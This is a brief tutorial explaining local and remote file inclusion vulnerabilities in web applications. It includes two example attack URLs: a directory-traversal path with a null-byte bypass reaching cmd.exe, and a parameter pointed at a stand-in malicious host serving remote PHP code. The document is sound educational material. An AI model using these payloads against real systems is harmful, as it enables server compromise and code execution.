File Inclusion

---

File inclusion is a web application vulnerability that allows an attacker either to download a file from an arbitrary location on the host file system or to upload an executable or script file to open a backdoor.

• attacker adds a file to the running process of a web app or website
• file is either constructed to be malicious or manipulated to serve the attacker’s malicious purposes

Types

Local file inclusion (LFI)

Local file inclusion (LFI) allows attackers to access local files on the server hosting a web application.

• attacker adds a file to the web app or website that already exists on the hosting server
• can occur from bad input validation or insecure coding practices
• often accomplished on servers that are vulnerable to directory traversal
  • attacker navigates through the server’s file structure and executes a file
• attacker could gain control over the server by opening a command prompt
• common tactic used is introducing a null character (%00 in URL encoding) at the end of the request
  • to bypass security mechanisms that automatically add a .php suffix to the request
  • enables the attacker to access non-PHP files:
    • /webpage.php?FONT=../../Windows/system32/cmd.exe%00

Remote file inclusion (RFI)

Remote file inclusion (RFI) allows attackers to inject code from a remote server into the application.

• attacker executes a script to inject a remote file into the web app or website
• attacker could force a parameter in a web page to call an external malicious link
  • which includes the compromised file
• e.g.,
  • consider a page built in PHP that does not properly filter arbitrary values added to page parameters
  • PHP code includes a FONT parameter which has five different options
    • each one a different font type
  • attacker can manipulate this parameter to inject an option that isn’t one of these five
  • and can point to an external URL that contains a malicious PHP file:
    • /webpage.php?FONT=http://www.malice.foo/malware.php